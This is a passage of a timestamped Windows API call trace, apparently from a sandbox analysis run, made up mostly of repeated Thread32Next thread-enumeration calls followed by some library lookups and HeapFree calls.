lpte=0x14fe78) returned 1 [0256.015] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.362] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.362] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.364] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.364] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.365] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.366] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.366] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.367] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.368] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.368] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.369] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.370] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.371] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.372] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.372] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.373] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.374] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.374] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.375] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.594] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.786] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.787] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.787] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.805] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.815] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.815] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.960] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.964] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.964] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.965] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.965] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.966] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.966] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.967] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.968] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.968] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.970] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.970] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.972] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.972] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.973] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.328] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.328] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.330] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.333] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.334] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.339] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0287.039] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0287.051] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0288.953] FreeLibrary (hLibModule=0x7ffc45e90000) returned 1 [0288.959] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0288.959] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0288.960] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0288.960] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0288.960] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0288.960] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f70f0 | out: hHeap=0x4e0000) returned 1 [0288.962] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb950 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e98f0 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e4b40 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f0220 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e4b80 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e9c20 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb2c0 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e3fb0 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb980 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e4bc0 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e4c00 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e4090 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e25f0 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, 